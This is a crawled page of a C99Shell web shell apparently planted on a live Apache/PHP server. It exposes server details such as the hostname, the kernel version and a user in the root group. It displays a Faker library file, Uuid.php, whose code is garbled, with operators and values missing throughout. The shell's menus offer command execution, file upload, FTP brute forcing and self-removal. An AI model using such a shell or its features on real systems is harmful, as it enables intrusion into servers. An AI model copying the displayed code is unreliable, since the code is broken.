!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/fakerphp/faker/src/Faker/Core/   drwxr-xr-x
Free 28.66 GB of 117.98 GB (24.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Uuid.php (2.01 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Faker\Core;

use 
Faker\Extension;

/**
 * @experimental This class is experimental and does not fall under our BC promise
 */
final class Uuid implements Extension\UuidExtension
{
    private 
Extension\NumberExtension $numberExtension;

    public function 
__construct(Extension\NumberExtension $numberExtension null)
    {

        
$this->numberExtension $numberExtension ?: new Number();
    }

    public function 
uuid3(): string
    
{
        
// fix for compatibility with 32bit architecture; each mt_rand call is restricted to 32bit
        // two such calls will cause 64bits of randomness regardless of architecture
        
$seed $this->numberExtension->numberBetween(02147483647) . '#' $this->numberExtension->numberBetween(02147483647);

        
// Hash the seed and convert to a byte array
        
$val md5($seedtrue);
        
$byte array_values(unpack('C16'$val));

        
// extract fields from byte array
        
$tLo = ($byte[0] << 24) | ($byte[1] << 16) | ($byte[2] << 8) | $byte[3];
        
$tMi = ($byte[4] << 8) | $byte[5];
        
$tHi = ($byte[6] << 8) | $byte[7];
        
$csLo $byte[9];
        
$csHi $byte[8] & 0x3f | (<< 7);

        
// correct byte order for big edian architecture
        
if (pack('L'0x6162797A) == pack('N'0x6162797A)) {
            
$tLo = (($tLo 0x000000ff) << 24) | (($tLo 0x0000ff00) << 8)
                | ((
$tLo 0x00ff0000) >> 8) | (($tLo 0xff000000) >> 24);
            
$tMi = (($tMi 0x00ff) << 8) | (($tMi 0xff00) >> 8);
            
$tHi = (($tHi 0x00ff) << 8) | (($tHi 0xff00) >> 8);
        }

        
// apply version number
        
$tHi &= 0x0fff;
        
$tHi |= (<< 12);

        
// cast to string
        
return sprintf(
            
'%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x',
            
$tLo,
            
$tMi,
            
$tHi,
            
$csHi,
            
$csLo,
            
$byte[10],
            
$byte[11],
            
$byte[12],
            
$byte[13],
            
$byte[14],
            
$byte[15],
        );
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--